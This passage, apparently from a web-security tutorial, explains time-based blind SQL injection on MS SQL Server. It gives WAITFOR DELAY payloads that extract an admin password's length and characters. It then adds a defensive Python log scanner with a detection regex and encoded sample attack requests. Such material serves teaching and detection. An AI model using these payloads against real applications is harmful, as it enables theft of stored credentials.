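Time based: Uses the timing of the page's response (whether it waits or not) to determine whether the injected statement executed successfully. It is typically used when the page gives no reliable response at all.
As with the previous technique, the usual method is inference:
Inferring the length of the admin password: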
select * from test where A = 1; if (select len(passwd) from users where id = 1) = 1 waitfor delay '0:0:10'--
select * from test where A = 1; if (select len(passwd) from users where id = 1) = 2 waitfor delay '0:0:10'--
select * from test where A = 1; if (select len(passwd) from users where id = 1) = 3 waitfor delay '0:0:10'--
Once the length is known, use binary search to infer the first character of the admin password:
select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 128 waitfor delay '0:0:10'--
select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 64 waitfor delay '0:0:10'--
select * from test where A = 1; if (select asc(mid(passwd,1,1)) from users where id = 1) > 32 waitfor delay '0:0:10'--
That is as far as this section goes. Time-based injection is relatively time-consuming, and the delay time can be adjusted freely!
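A defender-side check for the probes shown above, as an added example that is not part of the original page: it scans web access logs for WAITFOR DELAY clauses and counts responses that took at least the requested delay, which indicates the stacked statement actually ran. The log format, client addresses and request paths are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: client, request URI, response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 /item?A=1 0.04
10.0.0.9 /item?A=1%3B+if+(select+len(passwd)+from+users+where+id+%3D+1)+%3D+1+waitfor+delay+'0%3A0%3A10'-- 0.05
10.0.0.9 /item?A=1%3B+if+(select+len(passwd)+from+users+where+id+%3D+1)+%3D+2+waitfor+delay+'0%3A0%3A10'-- 0.06
10.0.0.9 /item?A=1%3B+if+(select+len(passwd)+from+users+where+id+%3D+1)+%3D+3+waitfor+delay+'0%3A0%3A10'-- 10.07
10.0.0.7 /search?q=please+wait+for+delay+notice 0.03
"""

# T-SQL delay clause as used in the payloads above, e.g. waitfor delay '0:0:10'
WAITFOR = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)


def scan(log_text, min_probes=3):
    """Map each client with >= min_probes WAITFOR requests to its counters.

    probes  = requests whose decoded URI contains a WAITFOR DELAY clause
    delayed = probes whose response took at least the requested delay,
              i.e. the injected statement ran and its condition was true
    """
    stats = defaultdict(lambda: {"probes": 0, "delayed": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        client, uri, seconds = parts
        match = WAITFOR.search(unquote_plus(uri))  # decode %3B, +, %3A first
        if not match:
            continue
        h, m, s = (int(g) for g in match.groups())
        stats[client]["probes"] += 1
        if float(seconds) >= h * 3600 + m * 60 + s:
            stats[client]["delayed"] += 1
    return {c: v for c, v in stats.items() if v["probes"] >= min_probes}


if __name__ == "__main__":
    for client, counters in scan(SAMPLE_LOG).items():
        print(client, counters)
```

A non-zero `delayed` count means the application is executing injected statements, not merely being probed, so it should be treated as a confirmed vulnerability rather than as scanner noise.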